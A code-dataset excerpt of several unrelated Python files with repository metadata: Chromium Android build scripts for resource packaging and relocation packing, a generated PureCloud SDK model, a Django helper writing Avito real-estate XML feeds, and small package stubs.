output_opts.add_argument('--apk-path', required=True, help='Path to output (partial) apk.') output_opts.add_argument('--apk-info-path', required=True, help='Path to output info file for the partial apk.') output_opts.add_argument('--srcjar-out', help='Path to srcjar to contain generated R.java.') output_opts.add_argument('--r-text-out', help='Path to store the generated R.txt file.') output_opts.add_argument('--proguard-file', help='Path to proguard.txt generated file') output_opts.add_argument( '--proguard-file-main-dex', help='Path to proguard.txt generated file for main dex') options = parser.parse_args(args) resource_utils.HandleCommonOptions(options) options.locale_whitelist = build_utils.ParseGnList(options.locale_whitelist) options.xxxhdpi_whitelist = build_utils.ParseGnList(options.xxxhdpi_whitelist) if options.check_resources_pkg_id is not None: if options.check_resources_pkg_id < 0: raise Exception( 'Package resource id should be integer in [0..127] range.') if options.shared_resources and options.app_as_shared_lib: raise Exception('Only one of --app-as-shared-lib or --shared-resources ' 'can be used.') return options def _ExtractPackageIdFromApk(apk_path, aapt_path): """Extract the package ID of a given APK (even intermediate ones). Args: apk_path: Input apk path. aapt_path: Path to aapt tool. Returns: An integer corresponding to the APK's package id. Raises: Exception if there is no resources table in the input file. """ cmd_args = [ aapt_path, 'dump', 'resources', apk_path ] output = build_utils.CheckOutput(cmd_args) for line in output.splitlines(): m = _RE_PACKAGE_DECLARATION.match(line) if m: return int(m.group(2), 16) raise Exception("No resources in this APK!") def _SortZip(original_path, sorted_path): """Generate new zip archive by sorting all files in the original by name.""" with zipfile.ZipFile(sorted_path, 'w') as sorted_zip, \ zipfile.ZipFile(original_path, 'r') as original_zip: for info in sorted(original_zip.infolist(), key=lambda i: i.filename): sorted_zip.writestr(info, original_zip.read(info)) def _DuplicateZhResources(resource_dirs): """Duplicate Taiwanese resources into Hong-Kong specific directory.""" renamed_paths = dict() for resource_dir in resource_dirs: # We use zh-TW resources for zh-HK (if we have zh-TW resources). for path in build_utils.IterFiles(resource_dir): if 'zh-rTW' in path: hk_path = path.replace('zh-rTW', 'zh-rHK') build_utils.MakeDirectory(os.path.dirname(hk_path)) shutil.copyfile(path, hk_path) renamed_paths[os.path.relpath(hk_path, resource_dir)] = os.path.relpath( path, resource_dir) return renamed_paths def _ToAaptLocales(locale_whitelist, support_zh_hk): """Converts the list of Chrome locales to aapt config locales.""" ret = set() for locale in locale_whitelist: locale = resource_utils.CHROME_TO_ANDROID_LOCALE_MAP.get(locale, locale) if locale is None or ('-' in locale and '-r' not in locale): raise Exception('CHROME_TO_ANDROID_LOCALE_MAP needs updating.' ' Found: %s' % locale) ret.add(locale) # Always keep non-regional fall-backs. language = locale.split('-')[0] ret.add(language) # We don't actually support zh-HK in Chrome on Android, but we mimic the # native side behavior where we use zh-TW resources when the locale is set to # zh-HK. See https://crbug.com/780847. if support_zh_hk: assert not any('HK' in l for l in locale_whitelist), ( 'Remove special logic if zh-HK is now supported (crbug.com/780847).') ret.add('zh-rHK') return sorted(ret) def _MoveImagesToNonMdpiFolders(res_root): """Move images from drawable-*-mdpi-* folders to drawable-* folders. Why? http://crbug.com/289843 """ renamed_paths = dict() for src_dir_name in os.listdir(res_root): src_components = src_dir_name.split('-') if src_components[0] != 'drawable' or 'mdpi' not in src_components: continue src_dir = os.path.join(res_root, src_dir_name) if not os.path.isdir(src_dir): continue dst_components = [c for c in src_components if c != 'mdpi'] assert dst_components != src_components dst_dir_name = '-'.join(dst_components) dst_dir = os.path.join(res_root, dst_dir_name) build_utils.MakeDirectory(dst_dir) for src_file_name in os.listdir(src_dir): if not os.path.splitext(src_file_name)[1] in ('.png', '.webp'): continue src_file = os.path.join(src_dir, src_file_name) dst_file = os.path.join(dst_dir, src_file_name) assert not os.path.lexists(dst_file) shutil.move(src_file, dst_file) renamed_paths[os.path.relpath(dst_file, res_root)] = os.path.relpath( src_file, res_root) return renamed_paths def _CreateLinkApkArgs(options): """Create command-line arguments list to invoke 'aapt2 link'. Args: options: The command-line options tuple. Returns: A list of strings corresponding to the command-line invokation for the command, matching the arguments from |options|. """ link_command = [ options.aapt_path + '2', 'link', '--version-code', options.version_code, '--version-name', options.version_name, '--auto-add-overlay', '--no-version-vectors', '-o', options.apk_path, ] for j in options.android_sdk_jars: link_command += ['-I', j] if options.proguard_file: link_command += ['--proguard', options.proguard_file] if options.proguard_file_main_dex: link_command += ['--proguard-main-dex', options.proguard_file_main_dex] if options.no_compress: for ext in options.no_compress.split(','): link_command += ['-0', ext] # Note: only one of --proto-format, --shared-lib or --app-as-shared-lib # can be used with recent versions of aapt2. if options.proto_format: link_command.append('--proto-format') elif options.shared_resources: link_command.append('--shared-lib') if options.locale_whitelist: aapt_locales = _ToAaptLocales( options.locale_whitelist, options.support_zh_hk) link_command += ['-c', ','.join(aapt_locales)] if options.no_xml_namespaces: link_command.append('--no-xml-namespaces') return link_command def _ExtractVersionFromSdk(aapt_path, sdk_path): """Extract version code and name from Android SDK .jar file. Args: aapt_path: Path to 'aapt' build tool. sdk_path: Path to SDK-specific android.jar file. Returns: A (version_code, version_name) pair of strings. """ output = build_utils.CheckOutput( [aapt_path, 'dump', 'badging', sdk_path], print_stdout=False, print_stderr=False) version_code = re.search(r"versionCode='(.*?)'", output).group(1) version_name = re.search(r"versionName='(.*?)'", output).group(1) return version_code, version_name, def _FixManifest(options, temp_dir): """Fix the APK's AndroidManifest.xml. This adds any missing namespaces for 'android' and 'tools', and sets certains elements like 'platformBuildVersionCode' or 'android:debuggable' depending on the content of |options|. Args: options: The command-line arguments tuple. temp_dir: A temporary directory where the fixed manifest will be written to. Returns: Path to the fixed manifest within |temp_dir|. """ debug_manifest_path = os.path.join(temp_dir, 'AndroidManifest.xml') _ANDROID_NAMESPACE = 'http://schemas.android.com/apk/res/android' _TOOLS_NAMESPACE = 'http://schemas.android.com/tools' ElementTree.register_namespace('android', _ANDROID_NAMESPACE) ElementTree.register_namespace('tools', _TOOLS_NAMESPACE) original_manifest = ElementTree.parse(options.android_manifest) def maybe_extract_version(j): try: return _ExtractVersionFromSdk(options.aapt_path, j) except build_utils.CalledProcessError: return None extract_all = [maybe_extract_version(j) for j in options.android_sdk_jars] successful_extractions = [x for x in extract_all if x] if len(successful_extractions) == 0: raise Exception( 'Unable to find android SDK jar among candidates: %s' % ', '.join(options.android_sdk_jars)) elif len(successful_extractions) > 1: raise Exception( 'Found multiple android SDK jars among candidates: %s' % ', '.join(options.android_sdk_jars)) version_code, version_name = successful_extractions.pop() # ElementTree.find does not work if the required tag is the root. if original_manifest.getroot().tag == 'manifest': manifest_node = original_manifest.getroot() else: manifest_node = original_manifest.find('manifest') manifest_node.set('platformBuildVersionCode', version_code) manifest_node.set('platformBuildVersionName', version_name) if options.debuggable: app_node = original_manifest.find('application') app_node.set('{%s}%s' % (_ANDROID_NAMESPACE, 'debuggable'), 'true') with open(debug_manifest_path, 'w') as debug_manifest: debug_manifest.write(ElementTree.tostring( original_manifest.getroot(), encoding='UTF-8')) return debug_manifest_path def _ResourceNameFromPath(path): return os.path.splitext(os.path.basename(path))[0] def _CreateKeepPredicate(resource_dirs, exclude_xxxhdpi, xxxhdpi_whitelist): """Return a predicate lambda to determine which resource files to keep.""" if not exclude_xxxhdpi: # Do not extract dotfiles (e.g. ".gitkeep"). aapt ignores them anyways. return lambda path: os.path.basename(path)[0] != '.' # Returns False only for xxxhdpi non-mipmap, non-whitelisted drawables. naive_predicate = lambda path: ( not re.search(r'[/-]xxxhdpi[/-]', path) or re.search(r'[/-]mipmap[/-]', path) or build_utils.MatchesGlob(path, xxxhdpi_whitelist)) # Build a set of all non-xxxhdpi drawables to ensure that we never exclude any # xxxhdpi drawable that does not exist in other densities. non_xxxhdpi_drawables = set() for resource_dir in resource_dirs: for path in build_utils.IterFiles(resource_dir): if re.search(r'[/-]drawable[/-]', path) and naive_predicate(path): non_xxxhdpi_drawables.add(_ResourceNameFromPath(path)) return lambda path: (naive_predicate(path) or _ResourceNameFromPath(path) not in non_xxxhdpi_drawables) def _ConvertToWebP(webp_binary, png_files): renamed_paths = dict() pool = multiprocessing.pool.ThreadPool(10) def convert_image(png_path_tuple): png_path, original_dir = png_path_tuple root = os.path.splitext(png_path)[0] webp_path = root + '.webp' args = [webp_binary, png_path, '-mt', '-quiet', '-m', '6', '-q', '100', '-lossless', '-o', webp_path] subprocess.check_call(args) os.remove(png_path) renamed_paths[os.path.relpath(webp_path, original_dir)] = os.path.relpath( png_path, original_dir) pool.map(convert_image, [f for f in png_files if not _PNG_WEBP_BLACKLIST_PATTERN.match(f[0])]) pool.close() pool.join() return renamed_paths def _CompileDeps(aapt_path, dep_subdirs, temp_dir): partials_dir = os.path.join(temp_dir, 'partials') build_utils.MakeDirectory(partials_dir) partial_compile_command = [ aapt_path + '2', 'compile', # TODO(wnwen): Turn this on once aapt2 forces 9-patch to be crunched. # '--no-crunch', ] pool = multiprocessing.pool.ThreadPool(10) def compile_partial(directory): dirname = os.path.basename(directory) partial_path = os.path.join(partials_dir, dirname + '.zip') compile_command = (partial_compile_command + ['--dir', directory, '-o', partial_path]) build_utils.CheckOutput(compile_command) # Sorting the files in the partial ensures deterministic output from the # aapt2 link step which uses order of files in the partial. sorted_partial_path = os.path.join(partials_dir, dirname + '.sorted.zip') _SortZip(partial_path, sorted_partial_path) return sorted_partial_path partials = pool.map(compile_partial, dep_subdirs) pool.close() pool.join() return partials def _CreateResourceInfoFile( renamed_paths, apk_info_path, dependencies_res_zips): lines = set() for zip_file in dependencies_res_zips: zip_info_file_path = zip_file + '.info' if os.path.exists(zip_info_file_path): with open(zip_info_file_path, 'r') as zip_info_file: lines.update(zip_info_file.readlines()) for dest, source in renamed_paths.iteritems(): lines.add('Rename:{},{}\n'.format(dest, source)) with open(apk_info_path, 'w') as info_file: info_file.writelines(sorted(lines)) def _PackageApk(options, dep_subdirs, temp_dir, gen_dir, r_txt_path): """Compile resources with aapt2 and generate intermediate .ap_ file. Args: options: The command-line options tuple. E.g. the generated apk will be written to |options.apk_path|. dep_subdirs: The list of directories where dependency resource zips were extracted (its content will be altered by this function). temp_dir: A temporary directory. gen_dir: Another temp directory where some intermediate files are generated. r_txt_path: The path where the R.txt file will written to. """ renamed_paths = dict() renamed_paths.update(_DuplicateZhResources(dep_subdirs)) keep_predicate = _CreateKeepPredicate( dep_subdirs, options.exclude_xxxhdpi, options.xxxhdpi_whitelist) png_paths = [] for directory in dep_subdirs: for f in build_utils.IterFiles(directory): if not keep_predicate(f): os.remove(f) elif f.endswith('.png'): png_paths.append((f, directory)) if png_paths and options.png_to_webp: renamed_paths.update(_ConvertToWebP(options.webp_binary, png_paths)) for directory in dep_subdirs: renamed_paths.update(_MoveImagesToNonMdpiFolders(directory)) link_command = _CreateLinkApkArgs(options) link_command += ['--output-text-symbols', r_txt_path] # TODO(digit): Is this below actually required for R.txt generation? link_command += ['--java', gen_dir] fixed_manifest = _FixManifest(options, temp_dir) link_command += ['--manifest', fixed_manifest] partials = _CompileDeps(options.aapt_path, dep_subdirs, temp_dir) for partial in partials: link_command += ['-R', partial] # Creates a .zip with AndroidManifest.xml, resources.arsc, res/* # Also creates R.txt build_utils.CheckOutput( link_command, print_stdout=False, print_stderr=False) _CreateResourceInfoFile( renamed_paths, options.apk_info_path, options.dependencies_res_zips) def _WriteFinalRTxtFile(options, aapt_r_txt_path): """Determine final R.txt and return its location. This handles --r-text-in and --r-text-out options at the same time. Args: options: The command-line options tuple. aapt_r_txt_path: The path to the R.txt generated by aapt. Returns: Path to the final R.txt file. """ if options.r_text_in: r_txt_file = options.r_text_in else: # When an empty res/ directory is passed, aapt does not write an R.txt. r_txt_file = aapt_r_txt_path if not os.path.exists(r_txt_file): build_utils.Touch(r_txt_file) if options.r_text_out: shutil.copyfile(r_txt_file, options.r_text_out) return r_txt_file def _OnStaleMd5(options): with resource_utils.BuildContext() as build: dep_subdirs = resource_utils.ExtractDeps(options.dependencies_res_zips, build.deps_dir) _PackageApk(options, dep_subdirs, build.temp_dir, build.gen_dir, build.r_txt_path) r_txt_path = _WriteFinalRTxtFile(options, build.r_txt_path) package = resource_utils.ExtractPackageFromManifest( options.android_manifest) # If --shared-resources-whitelist is used, the all resources listed in # the corresponding R.txt file will be non-final, and an onResourcesLoaded() # will be generated to adjust them at runtime. # # Otherwise, if --shared-resources is used, the all resources will be # non-final, and an onResourcesLoaded() method will be generated too. # # Otherwise, all resources will be final, and no method will be generated. # rjava_build_options = resource_utils.RJavaBuildOptions() if options.shared_resources_whitelist: rjava_build_options.ExportSomeResources( options.shared_resources_whitelist) rjava_build_options.GenerateOnResourcesLoaded() elif options.shared_resources or options.app_as_shared_lib: rjava_build_options.ExportAllResources() rjava_build_options.GenerateOnResourcesLoaded() resource_utils.CreateRJavaFiles( build.srcjar_dir, package, r_txt_path, options.extra_res_packages, options.extra_r_text_files, rjava_build_options) if options.srcjar_out: build_utils.ZipDir(options.srcjar_out, build.srcjar_dir) if options.check_resources_pkg_id is not None: expected_id = options.check_resources_pkg_id package_id = _ExtractPackageIdFromApk(options.apk_path, options.aapt_path) if package_id != expected_id: raise Exception('Invalid package ID 0x%x (expected 0x%x)' % (package_id, expected_id)) def main(args): args = build_utils.ExpandFileArgs(args) options = _ParseArgs(args) # Order of these must match order specified in GN so that the correct one # appears first in the depfile. possible_output_paths = [ options.apk_path, options.apk_path + '.info', options.r_text_out, options.srcjar_out, options.proguard_file, options.proguard_file_main_dex, ] output_paths = [x for x in possible_output_paths if x] # List python deps in input_strings rather than input_paths since the contents # of them does not change what gets written to the depsfile. input_strings = options.extra_res_packages + [ options.shared_resources, options.exclude_xxxhdpi, options.xxxhdpi_whitelist, str(options.debuggable), str(options.png_to_webp), str(options.support_zh_hk), str(options.no_xml_namespaces), ] input_strings.extend(_CreateLinkApkArgs(options)) possible_input_paths = [ options.aapt_path, options.android_manifest, options.shared_resources_whitelist, ] possible_input_paths += options.android_sdk_jars input_paths = [x for x in possible_input_paths if x] input_paths.extend(options.dependencies_res_zips) input_paths.extend(options.extra_r_text_files) if options.webp_binary: input_paths.append(options.webp_binary) build_utils.CallAndWriteDepfileIfStale( lambda: _OnStaleMd5(options), options, input_paths=input_paths, input_strings=input_strings, output_paths=output_paths, depfile_deps=options.dependencies_res_zips + options.extra_r_text_files) if __name__ == '__main__': main(sys.argv[1:])
[ "commit-bot@chromium.org" ]
commit-bot@chromium.org
aa5f9d8ad652004e8dfb05b3084f3c093ae308dc
b05761d771bb5a85d39d370c649567c1ff3eb089
/venv/lib/python3.10/site-packages/pastel/stack.py
54fb6dca9019d5c0546ee62d3ff5dcb3ade6c880
[]
no_license
JawshyJ/Coding_Practice
88c49cab955eab04609ec1003b6b8c20f103fc06
eb6b229d41aa49b1545af2120e6bee8e982adb41
refs/heads/master
2023-02-19T10:18:04.818542
2023-02-06T21:22:58
2023-02-06T21:22:58
247,788,631
4
0
null
null
null
null
UTF-8
Python
false
false
96
py
/home/runner/.cache/pip/pool/e2/22/00/6320ecd2562677b93d64e56de7c5734b6c4600779bf16003fa0927c1d3
[ "37465112+JawshyJ@users.noreply.github.com" ]
37465112+JawshyJ@users.noreply.github.com
2fc342fc0eebc6669e50dc50c0c1d8ca898780a2
234c7fb0bdabdd696c8e4c6a449ac2c8e3f14ad5
/build/PureCloudPlatformClientV2/models/flow_outcome_division_view_entity_listing.py
c6276c1beb04093276698b7e5c4e77068b3ab77d
[ "Apache-2.0", "MIT" ]
permissive
humano7/platform-client-sdk-python
2a942c43cc2d69e8cb0c4113d998e6e0664fdedb
dd5b693b1fc90c9dcb36885d7227f11221db5980
refs/heads/master
2023-04-12T05:05:53.932393
2021-04-22T03:41:22
2021-04-22T03:41:22
null
0
0
null
null
null
null
UTF-8
Python
false
false
9,784
py
# coding: utf-8 """ Copyright 2016 SmartBear Software Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Ref: https://github.com/swagger-api/swagger-codegen """ from pprint import pformat from six import iteritems import re import json from ..utils import sanitize_for_serialization class FlowOutcomeDivisionViewEntityListing(object): """ NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ def __init__(self): """ FlowOutcomeDivisionViewEntityListing - a model defined in Swagger :param dict swaggerTypes: The key is attribute name and the value is attribute type. :param dict attributeMap: The key is attribute name and the value is json key in definition. """ self.swagger_types = { 'entities': 'list[FlowOutcomeDivisionView]', 'page_size': 'int', 'page_number': 'int', 'total': 'int', 'first_uri': 'str', 'self_uri': 'str', 'next_uri': 'str', 'previous_uri': 'str', 'last_uri': 'str', 'page_count': 'int' } self.attribute_map = { 'entities': 'entities', 'page_size': 'pageSize', 'page_number': 'pageNumber', 'total': 'total', 'first_uri': 'firstUri', 'self_uri': 'selfUri', 'next_uri': 'nextUri', 'previous_uri': 'previousUri', 'last_uri': 'lastUri', 'page_count': 'pageCount' } self._entities = None self._page_size = None self._page_number = None self._total = None self._first_uri = None self._self_uri = None self._next_uri = None self._previous_uri = None self._last_uri = None self._page_count = None @property def entities(self): """ Gets the entities of this FlowOutcomeDivisionViewEntityListing. :return: The entities of this FlowOutcomeDivisionViewEntityListing. :rtype: list[FlowOutcomeDivisionView] """ return self._entities @entities.setter def entities(self, entities): """ Sets the entities of this FlowOutcomeDivisionViewEntityListing. :param entities: The entities of this FlowOutcomeDivisionViewEntityListing. :type: list[FlowOutcomeDivisionView] """ self._entities = entities @property def page_size(self): """ Gets the page_size of this FlowOutcomeDivisionViewEntityListing. :return: The page_size of this FlowOutcomeDivisionViewEntityListing. :rtype: int """ return self._page_size @page_size.setter def page_size(self, page_size): """ Sets the page_size of this FlowOutcomeDivisionViewEntityListing. :param page_size: The page_size of this FlowOutcomeDivisionViewEntityListing. :type: int """ self._page_size = page_size @property def page_number(self): """ Gets the page_number of this FlowOutcomeDivisionViewEntityListing. :return: The page_number of this FlowOutcomeDivisionViewEntityListing. :rtype: int """ return self._page_number @page_number.setter def page_number(self, page_number): """ Sets the page_number of this FlowOutcomeDivisionViewEntityListing. :param page_number: The page_number of this FlowOutcomeDivisionViewEntityListing. :type: int """ self._page_number = page_number @property def total(self): """ Gets the total of this FlowOutcomeDivisionViewEntityListing. :return: The total of this FlowOutcomeDivisionViewEntityListing. :rtype: int """ return self._total @total.setter def total(self, total): """ Sets the total of this FlowOutcomeDivisionViewEntityListing. :param total: The total of this FlowOutcomeDivisionViewEntityListing. :type: int """ self._total = total @property def first_uri(self): """ Gets the first_uri of this FlowOutcomeDivisionViewEntityListing. :return: The first_uri of this FlowOutcomeDivisionViewEntityListing. :rtype: str """ return self._first_uri @first_uri.setter def first_uri(self, first_uri): """ Sets the first_uri of this FlowOutcomeDivisionViewEntityListing. :param first_uri: The first_uri of this FlowOutcomeDivisionViewEntityListing. :type: str """ self._first_uri = first_uri @property def self_uri(self): """ Gets the self_uri of this FlowOutcomeDivisionViewEntityListing. :return: The self_uri of this FlowOutcomeDivisionViewEntityListing. :rtype: str """ return self._self_uri @self_uri.setter def self_uri(self, self_uri): """ Sets the self_uri of this FlowOutcomeDivisionViewEntityListing. :param self_uri: The self_uri of this FlowOutcomeDivisionViewEntityListing. :type: str """ self._self_uri = self_uri @property def next_uri(self): """ Gets the next_uri of this FlowOutcomeDivisionViewEntityListing. :return: The next_uri of this FlowOutcomeDivisionViewEntityListing. :rtype: str """ return self._next_uri @next_uri.setter def next_uri(self, next_uri): """ Sets the next_uri of this FlowOutcomeDivisionViewEntityListing. :param next_uri: The next_uri of this FlowOutcomeDivisionViewEntityListing. :type: str """ self._next_uri = next_uri @property def previous_uri(self): """ Gets the previous_uri of this FlowOutcomeDivisionViewEntityListing. :return: The previous_uri of this FlowOutcomeDivisionViewEntityListing. :rtype: str """ return self._previous_uri @previous_uri.setter def previous_uri(self, previous_uri): """ Sets the previous_uri of this FlowOutcomeDivisionViewEntityListing. :param previous_uri: The previous_uri of this FlowOutcomeDivisionViewEntityListing. :type: str """ self._previous_uri = previous_uri @property def last_uri(self): """ Gets the last_uri of this FlowOutcomeDivisionViewEntityListing. :return: The last_uri of this FlowOutcomeDivisionViewEntityListing. :rtype: str """ return self._last_uri @last_uri.setter def last_uri(self, last_uri): """ Sets the last_uri of this FlowOutcomeDivisionViewEntityListing. :param last_uri: The last_uri of this FlowOutcomeDivisionViewEntityListing. :type: str """ self._last_uri = last_uri @property def page_count(self): """ Gets the page_count of this FlowOutcomeDivisionViewEntityListing. :return: The page_count of this FlowOutcomeDivisionViewEntityListing. :rtype: int """ return self._page_count @page_count.setter def page_count(self, page_count): """ Sets the page_count of this FlowOutcomeDivisionViewEntityListing. :param page_count: The page_count of this FlowOutcomeDivisionViewEntityListing. :type: int """ self._page_count = page_count def to_dict(self): """ Returns the model properties as a dict """ result = {} for attr, _ in iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_json(self): """ Returns the model as raw JSON """ return json.dumps(sanitize_for_serialization(self.to_dict())) def to_str(self): """ Returns the string representation of the model """ return pformat(self.to_dict()) def __repr__(self): """ For `print` and `pprint` """ return self.to_str() def __eq__(self, other): """ Returns true if both objects are equal """ return self.__dict__ == other.__dict__ def __ne__(self, other): """ Returns true if both objects are not equal """ return not self == other
[ "purecloud-jenkins@ininica.com" ]
purecloud-jenkins@ininica.com
07a0488b1aea8b5844b465d7c255d1e90e95f08c
45034fd848c701ecdcb5f3bd1d3ea43d24abce2d
/agency/xml/feed_avito.py
cb819342318182284342678e39ff819c7382551e
[]
no_license
JazinBazin/height
b5740d17fb5e6e184f8af40d16ccad12d57cea58
06fd76fc62567efd3688688197cc66a205a0c309
refs/heads/master
2020-05-20T17:05:20.892218
2019-06-29T13:40:40
2019-06-29T13:40:40
185,679,726
0
0
null
null
null
null
UTF-8
Python
false
false
4,041
py
import xml.etree.ElementTree as ET avito_feed_file_name = 'feed_avito.xml' def avito_add_lot_offer(instance): try: if instance.transaction_type != 'p': return tree = ET.parse(avito_feed_file_name) feed = tree.getroot() avito_create_lot_offer(feed, instance) tree.write(avito_feed_file_name, encoding='UTF-8', xml_declaration=False) except Exception as ex: with open('log.txt', 'a') as log_file: log_file.write('error in function avito_add_lot_offer. pk = ' + str(instance.pk) + '\nwhat: ' + str(ex) + '\n') def avito_remove_lot_offer(pk): try: pk = str(pk) tree = ET.parse(avito_feed_file_name) feed = tree.getroot() for ad in feed: ad_id = ad.find('Id') if ad_id.text == pk: feed.remove(ad) break tree.write(avito_feed_file_name, encoding='UTF-8', xml_declaration=False) except Exception as ex: with open('log.txt', 'a') as log_file: log_file.write('error in function avito_remove_lot_offer. pk = ' + str(pk) + '\nwhat: ' + str(ex) + '\n') def avito_update_lot_offer(instance): avito_remove_lot_offer(instance.pk) avito_add_lot_offer(instance) def avito_create_lot_offer(feed, instance): Ad = ET.Element('Ad') feed.append(Ad) ad_id = ET.SubElement(Ad, 'Id') ad_id.text = str(instance.pk) AllowEmail = ET.SubElement(Ad, 'AllowEmail') AllowEmail.text = 'Да' ManagerName = ET.SubElement(Ad, 'ManagerName') ManagerName.text = 'Юденич Светлана Станиславовна' ContactPhone = ET.SubElement(Ad, 'ContactPhone') ContactPhone.text = '+7 (978) 834-31-76' Address = ET.SubElement(Ad, 'Address') Address.text = 'Россия, Крым' if instance.district: Address.text += ', ' + str(instance.district) if 'район' not in str(instance.district).lower(): Address.text += ' район' if instance.populated_area: Address.text += ', ' + str(instance.populated_area) DistanceToCity = ET.SubElement(Ad, 'DistanceToCity') DistanceToCity.text = '0' Description = ET.SubElement(Ad, 'Description') Description.text = str(instance.description) Category = ET.SubElement(Ad, 'Category') Category.text = 'Земельные участки' OperationType = ET.SubElement(Ad, 'OperationType') OperationType.text = 'Продам' Price = ET.SubElement(Ad, 'Price') if instance.currency == 'r': Price.text = str(int(instance.price)) elif instance.currency == 'd': Price.text = str(int(instance.price * 60)) else: Price.text = str(int(instance.price * 70)) LandArea = ET.SubElement(Ad, 'LandArea') if instance.area_units == 'm': LandArea.text = str(int(instance.area / 100)) elif instance.area_units == 'h': LandArea.text = str(int(instance.area * 100)) else: LandArea.text = str(int(instance.area)) PropertyRights = ET.SubElement(Ad, 'PropertyRights') if instance.cadastral_number: PropertyRights.text = 'Собственник' CadastralNumber = ET.SubElement(Ad, 'CadastralNumber') CadastralNumber.text = str(instance.cadastral_number) else: PropertyRights.text = 'Посредник' ObjectType = ET.SubElement(Ad, 'ObjectType') if instance.lot_type == 'i': ObjectType.text = 'Поселений (ИЖС)' else: ObjectType.text = 'Сельхозназначения (СНТ, ДНП)' Images = ET.SubElement(Ad, 'Images') Image = ET.SubElement(Images, 'Image') Image.set('url', 'https://высота-крым.рф' + str(instance.image.url)) for photo in instance.images.all(): Image = ET.SubElement(Images, 'Image') Image.set('url', 'https://высота-крым.рф' + str(photo.image.url))
[ "yudenichaa@yandex.ru" ]
yudenichaa@yandex.ru
c9b0c8e2dfee1bbb42c1b6a641db68ca4e2c25d9
037877a31670a85fa78b61df9ceabe981cfdfbf6
/sympy/concrete/__init__.py
ad08eb41b7aa48ef70be397eb1ba68e3f15b61f0
[]
no_license
certik/sympy_gamma
6343b02e5d6d1c7d511a3329bbbd27cd11cd7ec8
b0e555ca03f8476533cb1c19575f4461533837de
refs/heads/master
2020-12-25T03:52:40.132034
2010-02-15T08:02:31
2010-02-15T08:02:31
344,391
2
2
null
null
null
null
UTF-8
Python
false
false
136
py
from products import product, Product from summations import sum, Sum from sums_products import Sum2 from gosper import normal, gosper
[ "ondrej@certik.cz" ]
ondrej@certik.cz
03dfab3cd71fc24f153386023aa51f38c46348bd
612325535126eaddebc230d8c27af095c8e5cc2f
/src/build/android/gyp/pack_relocations.py
89c01f05a61391682feebe40ddd3c8c1930db4b5
[ "BSD-3-Clause" ]
permissive
TrellixVulnTeam/proto-quic_1V94
1a3a03ac7a08a494b3d4e9857b24bb8f2c2cd673
feee14d96ee95313f236e0f0e3ff7719246c84f7
refs/heads/master
2023-04-01T14:36:53.888576
2019-10-17T02:23:04
2019-10-17T02:23:04
null
0
0
null
null
null
null
UTF-8
Python
false
false
3,671
py
#!/usr/bin/env python # # Copyright 2014 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Pack relocations in a library (or copy unchanged). If --enable-packing and --configuration-name=='Release', invoke the relocation_packer tool to pack the .rel.dyn or .rela.dyn section in the given library files. This step is inserted after the libraries are stripped. If --enable-packing is zero, the script copies files verbatim, with no attempt to pack relocations. """ import ast import optparse import os import shutil import sys import tempfile from util import build_utils def PackLibraryRelocations(android_pack_relocations, library_path, output_path): shutil.copy(library_path, output_path) pack_command = [android_pack_relocations, output_path] build_utils.CheckOutput(pack_command) def CopyLibraryUnchanged(library_path, output_path): shutil.copy(library_path, output_path) def main(args): args = build_utils.ExpandFileArgs(args) parser = optparse.OptionParser() build_utils.AddDepfileOption(parser) parser.add_option('--clear-dir', action='store_true', help='If set, the destination directory will be deleted ' 'before copying files to it. This is highly recommended to ' 'ensure that no stale files are left in the directory.') parser.add_option('--configuration-name', default='Release', help='Gyp configuration name (i.e. Debug, Release)') parser.add_option('--enable-packing', choices=['0', '1'], help=('Pack relocations if 1 and configuration name is \'Release\',' ' otherwise plain file copy')) parser.add_option('--android-pack-relocations', help='Path to the relocations packer binary') parser.add_option('--stripped-libraries-dir', help='Directory for stripped libraries') parser.add_option('--packed-libraries-dir', help='Directory for packed libraries') parser.add_option('--libraries', action='append', help='List of libraries in Python dictionary format') parser.add_option('--stamp', help='Path to touch on success') parser.add_option('--filelistjson', help='Output path of filelist.json to write') options, _ = parser.parse_args(args) enable_packing = (options.enable_packing == '1' and options.configuration_name == 'Release') libraries = [] for libs_arg in options.libraries: libraries += ast.literal_eval(libs_arg) if options.clear_dir: build_utils.DeleteDirectory(options.packed_libraries_dir) build_utils.MakeDirectory(options.packed_libraries_dir) output_paths = [] for library in libraries: library_path = os.path.join(options.stripped_libraries_dir, library) output_path = os.path.join( options.packed_libraries_dir, os.path.basename(library)) output_paths.append(output_path) if enable_packing: PackLibraryRelocations(options.android_pack_relocations, library_path, output_path) else: CopyLibraryUnchanged(library_path, output_path) if options.filelistjson: build_utils.WriteJson({ 'files': output_paths }, options.filelistjson) output_paths.append(options.filelistjson) if options.depfile: build_utils.WriteDepfile(options.depfile, output_paths[-1], libraries) if options.stamp: build_utils.Touch(options.stamp) return 0 if __name__ == '__main__': sys.exit(main(sys.argv[1:]))
[ "2100639007@qq.com" ]
2100639007@qq.com
b5261996143a809047a41f5fd39fe46b57b79f0c
15b12d69ac3123d1562986970ce01d7a47d171de
/typings/nltk/misc/wordfinder.pyi
8fbb7b9a5fbec1e043e6e51712347842946e93d0
[ "Apache-2.0" ]
permissive
simplymanas/python-learning
9b67b5a7acfb3a7c2455a7d1fc66203a2b419c37
75bc99c0dce211fd1bce5f6ce1155e0f4c71d7d0
refs/heads/master
2021-07-11T06:40:24.803589
2021-06-20T12:06:02
2021-06-20T12:06:02
241,769,614
5
1
null
null
null
null
UTF-8
Python
false
false
1,103
pyi
